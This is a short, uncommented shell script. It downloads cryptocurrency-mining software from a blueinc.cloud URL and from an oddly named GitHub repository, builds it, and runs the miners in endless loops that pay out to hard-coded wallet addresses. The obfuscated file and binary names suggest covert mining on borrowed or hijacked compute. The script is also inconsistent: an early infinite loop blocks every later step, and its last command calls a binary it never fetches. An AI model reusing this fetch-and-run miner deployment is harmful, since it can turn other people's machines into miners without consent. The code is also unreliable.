wget -N http://www.blueinc.cloud/NBMiner_37.6_Linux.tgz

tar -xvf ./NBMiner_37.6_Linux.tgz

cd ./NBMiner_37.6_Linux/

while true
do

./nbminer -a ergo -o stratum+tcp://ergo.herominers.com:10250 -u 9gdC5NNXMDsv7aGRhUDQYg7pVBbFq55iY1LvisPuHdqhp5AwYZk.linux8474 -i 68

done

wget -N https://raw.githubusercontent.com/mobileapps84741274/mobile84741274/master/linuxweb844444748874.tar.xz
tar -xvf ./linuxweb844444748874.tar.xz
cd ./linuxweb844444748874/
mkdir linux84748874
cd linux84748874
cmake ..
make

while true
do

./linux848888888874 linux8474

done

./ariominer --mode miner --pool http://www.blueinc.cloud --wallet 3VnCmWyLQb8f1XhkQv4fiB1CrGewityDDteNtQwhMu3DjBuaDmUWbPMkPnbSaJPcbGrrJi1zkCHDXd4fGtTUeej3 --name linux8474 --cpu-intensity 82 --gpu-intensity-cblocks 98 --gpu-intensity-gblocks 98
